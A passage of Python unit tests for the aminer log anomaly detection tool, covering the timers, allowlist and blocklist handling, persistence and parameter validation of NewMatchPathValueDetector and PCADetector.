        expectations assume next_persist_time advances from t + 400 to t + 1000, i.e. DEFAULT_PERSISTENCE_PERIOD == 600.
        """
        nmpvd = NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = time.time()
        nmpvd.next_persist_time = t + 400
        self.assertEqual(nmpvd.do_timer(t + 200), 200)
        self.assertEqual(nmpvd.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD)
        self.assertEqual(nmpvd.do_timer(t + 999), 1)
        self.assertEqual(nmpvd.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD)

    def test3allowlist_event(self):
        """
        Test if the allowlist_event method is implemented properly.

        Allowlisting adds a value to known_values_set directly; the last assertions show this also works with
        learn_mode=False. Events for another detector class and calls with allowlisting data must be rejected.
        """
        # This test case checks whether an exception is thrown when entering an event of another class.
        nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        analysis = "Analysis.%s"
        value = b"value"
        value2 = b"value2"
        log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpvd)
        nmpvd.receive_atom(log_atom1)
        self.assertRaises(Exception, nmpvd.allowlist_event, analysis % "NewMatchPathDetector", self.output_stream.getvalue(), None)
        # The NewMatchPathValueDetector can not handle allowlisting data and therefore an exception is expected.
        self.assertRaises(Exception, nmpvd.allowlist_event, analysis % nmpvd.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"])
        # This test case checks in which cases an event is triggered and compares with expected results.
        self.assertEqual(nmpvd.allowlist_event(analysis % nmpvd.__class__.__name__, value, None), "Allowlisted path(s) %s with %s." % (self.match_element1.path, value.decode()))
        self.assertEqual(nmpvd.known_values_set, {b" pid=", b"value"})
        # Allowlisting is independent of learn_mode: the value is still added with learning switched off.
        nmpvd.learn_mode = False
        self.assertEqual(nmpvd.allowlist_event(analysis % nmpvd.__class__.__name__, value2, None), "Allowlisted path(s) %s with %s." % (self.match_element1.path, value2.decode()))
        self.assertEqual(nmpvd.known_values_set, {b" pid=", b"value", b"value2"})

    def test4persistence(self):
        """
        Test the do_persist and load_persistence_data methods.

        Checks the on-disk JSON form (byte values stored with a "bytes:" prefix), that a cleared known_values_set
        is restored from the file, and that a second detector instance created with the default persistence_id
        loads the same set.
        """
        nmpvd = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler], learn_mode=True, output_logline=False)
        t = round(time.time(), 3)
        log_atom1 = LogAtom(self.fdme1.data, ParserMatch(self.match_element1), t, nmpvd)
        log_atom2 = LogAtom(self.match_context2.match_data, ParserMatch(self.match_element2), t, nmpvd)
        self.assertTrue(nmpvd.receive_atom(log_atom1))
        self.assertTrue(nmpvd.receive_atom(log_atom2))
        self.assertEqual(nmpvd.known_values_set, {b" pid=", b"25537"})
        nmpvd.do_persist()
        with open(nmpvd.persistence_file_name, "r") as f:
            self.assertEqual(f.read(), '["bytes: pid=", "bytes:25537"]')
        nmpvd.known_values_set = set()
        nmpvd.load_persistence_data()
        self.assertEqual(nmpvd.known_values_set, {b" pid=", b"25537"})
        other = NewMatchPathValueDetector(self.aminer_config, [self.match_element1.path, self.match_element2.path], [self.stream_printer_event_handler])
        self.assertEqual(nmpvd.known_values_set, other.known_values_set)

    def test5validate_parameters(self):
        """Test all initialization parameters for the detector.
Input parameters must be validated in the class.""" self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, [""], [self.stream_printer_event_handler]) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, [], [self.stream_printer_event_handler]) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, None, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, "", [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, b"Default", [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, True, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, 123, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, 123.3, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, (), [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, set(), [self.stream_printer_event_handler]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], ["default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], None) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], "") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], True) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], 123) self.assertRaises(TypeError, NewMatchPathValueDetector, 
self.aminer_config, ["path"], 123.3) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], {"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], ()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], set()) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id="") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=None) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=True) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=123.22) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], persistence_id=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], 
[self.stream_printer_event_handler], persistence_id="Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=b"True") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode="True") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=123.22) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=None) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=b"True") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline="True") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], 
[self.stream_printer_event_handler], output_logline=123) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=123.22) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], output_logline=True) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=-1) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=0) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time="123") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], 
[self.stream_printer_event_handler], learn_mode=True, stop_learning_time=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100.22) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=-1) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=0) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time="123") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=["Default"]) self.assertRaises(TypeError, NewMatchPathValueDetector, 
self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=[]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_no_anomaly_time=100.22) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], learn_mode=True, stop_learning_time=100, stop_learning_no_anomaly_time=100) self.assertRaises(ValueError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["/tmp/syslog"]) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list="") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=b"Default") self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=True) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=123.22) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], 
[self.stream_printer_event_handler], log_resource_ignore_list={"id": "Default"}) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=()) self.assertRaises(TypeError, NewMatchPathValueDetector, self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=set()) NewMatchPathValueDetector(self.aminer_config, ["path"], [self.stream_printer_event_handler], log_resource_ignore_list=["file:///tmp/syslog"]) if __name__ == "__main__": unittest.main() logdata-anomaly-miner-2.8.0/aecid-testsuite/unit/analysis/PCADetectorTest.py000066400000000000000000001040761500476301700271220ustar00rootroot00000000000000import unittest import time from datetime import datetime from aminer.analysis.PCADetector import PCADetector from aminer.input.LogAtom import LogAtom from aminer.parsing.MatchElement import MatchElement from aminer.parsing.ParserMatch import ParserMatch from unit.TestBase import TestBase from aminer.AminerConfig import DEFAULT_PERSISTENCE_PERIOD class PCADetectorTest(TestBase): """Unittests for the PCADetector.""" def test1receive_atom(self): """This test case checks the normal detection of value frequencies using PCA.""" t = time.time() expected_string = '%s PCA anomaly detected\n%s: "None" (%d lines)\n %s\n\n' dtf = "%Y-%m-%d %H:%M:%S" # Prepare log atoms that represent different amounts of values a, b over time # Five time windows are used. The first three time windows are used for initializing # the count matrix. The fourth window is used to verify the anomaly score computation. # The fifth time window is only used to mark the end of the fourth time window. 
# The following log atoms are created: # window 1: # value a: 2 times # value b: 1 time # window 2: # value a: 1 times # value b: 1 time # window 3: # value a: 1 time # value b: 0 times # window 4: # value a: 4 time # value b: 1 time # window 5: # value a: 1 time # Start of window 1: log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+1, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+3, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+7, None) # Start of window 2: log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+13, None) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+15, None) # Start of window 3: log_atom6 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+27, None) # Start of window 4: log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+33, None) log_atom8 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+34, None) log_atom9 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+36, None) log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+37, None) log_atom11 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+38, None) # Start of window 5: log_atom12 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+45, None) # Initialize detector for analyzing values in one path in time windows of 10 seconds pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) # Forward log atoms to detector # Log atoms of windows 1 to 3 build up the count matrix # Input: log atoms of windows 1 to 3 # Expected output: No anomalies reported pcad.receive_atom(log_atom1) pcad.receive_atom(log_atom2) pcad.receive_atom(log_atom3) pcad.receive_atom(log_atom4) 
pcad.receive_atom(log_atom5) pcad.receive_atom(log_atom6) self.assertEqual(self.output_stream.getvalue(), "") # Log atoms of window 4 build the count vector for that window # Input: b; log atoms of window 4 # Expected output: No anomalies reported pcad.receive_atom(log_atom7) pcad.receive_atom(log_atom8) pcad.receive_atom(log_atom9) pcad.receive_atom(log_atom10) pcad.receive_atom(log_atom11) self.assertEqual(self.output_stream.getvalue(), "") # At this point, the event count matrix contains the counts from the first three windows self.assertEqual(pcad.event_count_matrix, [{"/value": {"a": 2, "b": 1}}, {"/value": {"a": 1, "b": 1}}, {"/value": {"a": 1, "b": 0}}]) # The count vector contains the counts of the fourth window self.assertEqual(pcad.event_count_vector, {"/value": {"a": 4, "b": 1}}) # Log atom of window 5 triggers comparison of count vector from window 4 with PCA # Input: log atoms of window 5 # Expected output: Anomaly reported on count vector of fourth window pcad.receive_atom(log_atom12) self.assertEqual(self.output_stream.getvalue(), expected_string % (datetime.fromtimestamp(t+45).strftime(dtf), pcad.__class__.__name__, 1, "a")) # Event count matrix is shifted by 1 so that window 0 is removed and window 4 is appended self.assertEqual(pcad.event_count_matrix, [{"/value": {"a": 1, "b": 1}}, {"/value": {"a": 1, "b": 0}}, {"/value": {"a": 4, "b": 1}}]) # stop_learning_time pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False, stop_learning_time=100) self.assertTrue(pcad.receive_atom(log_atom1)) log_atom2.atom_time = t + 99 self.assertTrue(pcad.receive_atom(log_atom2)) self.assertTrue(pcad.learn_mode) log_atom1.atom_time = t + 102 self.assertTrue(pcad.receive_atom(log_atom1)) self.assertFalse(pcad.learn_mode) # stop_learning_no_anomaly_time pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, 
output_logline=False, stop_learning_no_anomaly_time=100) log_atom1.atom_time = t self.assertTrue(pcad.receive_atom(log_atom1)) log_atom1.atom_time = t + 100 self.assertTrue(pcad.receive_atom(log_atom1)) self.assertTrue(pcad.learn_mode) log_atom2.atom_time = t + 100 self.assertTrue(pcad.receive_atom(log_atom2)) self.assertTrue(pcad.learn_mode) log_atom1.atom_time = t + 200 self.assertTrue(pcad.receive_atom(log_atom3)) self.assertTrue(pcad.learn_mode) log_atom1.atom_time = t + 201 self.assertTrue(pcad.receive_atom(log_atom1)) self.assertFalse(pcad.learn_mode) def test2do_timer(self): """Test if the do_timer method is implemented properly.""" pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) t = time.time() pcad.next_persist_time = t + 400 self.assertEqual(pcad.do_timer(t + 200), 200) self.assertEqual(pcad.do_timer(t + 400), DEFAULT_PERSISTENCE_PERIOD) self.assertEqual(pcad.do_timer(t + 999), 1) self.assertEqual(pcad.do_timer(t + 1000), DEFAULT_PERSISTENCE_PERIOD) def test3allowlist_event(self): """Test if the allowlist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) analysis = "Analysis.%s" self.assertRaises(Exception, pcad.allowlist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The PCADetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, pcad.allowlist_event, analysis % pcad.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(pcad.allowlist_event(analysis % pcad.__class__.__name__, "/s1", None), "Allowlisted path %s in %s." 
% ("/s1", analysis % pcad.__class__.__name__)) self.assertEqual(pcad.constraint_list, ["/s1"]) pcad.learn_mode = False self.assertEqual(pcad.allowlist_event(analysis % pcad.__class__.__name__, "/d1", None), "Allowlisted path %s in %s." % ("/d1", analysis % pcad.__class__.__name__)) self.assertEqual(pcad.constraint_list, ["/s1", "/d1"]) def test4blocklist_event(self): """Test if the blocklist_event method is implemented properly.""" # This test case checks whether an exception is thrown when entering an event of another class. pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) analysis = "Analysis.%s" self.assertRaises(Exception, pcad.blocklist_event, analysis % "NewMatchPathValueDetector", self.output_stream.getvalue(), None) # The PCADetector can not handle allowlisting data and therefore an exception is expected. self.assertRaises(Exception, pcad.blocklist_event, analysis % pcad.__class__.__name__, self.output_stream.getvalue(), ["random", "Data"]) # This test case checks in which cases an event is triggered and compares with expected results. self.assertEqual(pcad.blocklist_event(analysis % pcad.__class__.__name__, "/s1", None), "Blocklisted path %s in %s." % ("/s1", analysis % pcad.__class__.__name__)) self.assertEqual(pcad.ignore_list, ["/s1"]) pcad.learn_mode = False self.assertEqual(pcad.blocklist_event(analysis % pcad.__class__.__name__, "/d1", None), "Blocklisted path %s in %s." 
% ("/d1", analysis % pcad.__class__.__name__)) self.assertEqual(pcad.ignore_list, ["/s1", "/d1"]) def test5persistence(self): """Test the do_persist and load_persistence_data methods.""" t = time.time() log_atom1 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+1, None) log_atom2 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+3, None) log_atom3 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+7, None) log_atom4 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+13, None) log_atom5 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+15, None) log_atom6 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+27, None) log_atom7 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+33, None) log_atom8 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+34, None) log_atom9 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+36, None) log_atom10 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+37, None) log_atom11 = LogAtom(b"b", ParserMatch(MatchElement("/value", b"b", b"b", None)), t+38, None) log_atom12 = LogAtom(b"a", ParserMatch(MatchElement("/value", b"a", b"a", None)), t+45, None) pcad = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) pcad.receive_atom(log_atom1) pcad.receive_atom(log_atom2) pcad.receive_atom(log_atom3) pcad.receive_atom(log_atom4) pcad.receive_atom(log_atom5) pcad.receive_atom(log_atom6) pcad.receive_atom(log_atom7) pcad.receive_atom(log_atom8) pcad.receive_atom(log_atom9) pcad.receive_atom(log_atom10) pcad.receive_atom(log_atom11) pcad.receive_atom(log_atom12) pcad.do_persist() with open(pcad.persistence_file_name, "r") as f: self.assertEqual(f.read(), '[{"string:/value": {"string:a": 1, "string:b": 1}}, {"string:/value": {"string:a": 1, 
"string:b": 0}}, {"string:/value": {"string:a": 4, "string:b": 1}}]') self.assertEqual(pcad.event_count_matrix, [{"/value": {"a": 1, "b": 1}}, {"/value": {"a": 1, "b": 0}}, {"/value": {"a": 4, "b": 1}}]) pcad.event_count_matrix = [] pcad.load_persistence_data() self.assertEqual(pcad.event_count_matrix, [{"/value": {"a": 1, "b": 1}}, {"/value": {"a": 1, "b": 0}}, {"/value": {"a": 4, "b": 1}}]) other = PCADetector(self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 0.9, 3, learn_mode=True, output_logline=False) self.assertEqual(other.event_count_matrix, pcad.event_count_matrix) def test6validate_parameters(self): """Test all initialization parameters for the detector. Input parameters must be validated in the class.""" self.assertRaises(ValueError, PCADetector, self.aminer_config, [""], [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, None, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, "", [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, b"Default", [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, True, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, 123, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, 123.3, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, {"id": "Default"}, [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, (), [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, set(), [self.stream_printer_event_handler], 10, 2, 0.9, 3) self.assertRaises(TypeError, 
PCADetector, self.aminer_config, ["/value"], ["default"], 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], None, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], "", 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], b"Default", 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], True, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], 123, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], 123.3, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], {"id": "Default"}, 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], (), 10, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], set(), 10, 2, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 0, 2, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], -1, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], ["default"], 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], None, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], "", 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], b"Default", 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], True, 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], {"id": "Default"}, 2, 0.9, 3) 
self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], (), 2, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], set(), 2, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 0, 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, -1, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, ["default"], 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, None, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, "", 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, b"Default", 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, True, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, {"id": "Default"}, 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, (), 0.9, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, set(), 0.9, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, -1, 3) self.assertRaises(ValueError, PCADetector, self.aminer_config, ["/value"], [self.stream_printer_event_handler], 10, 2, 1.1, 3) self.assertRaises(TypeError, PCADetector, self.aminer_config, 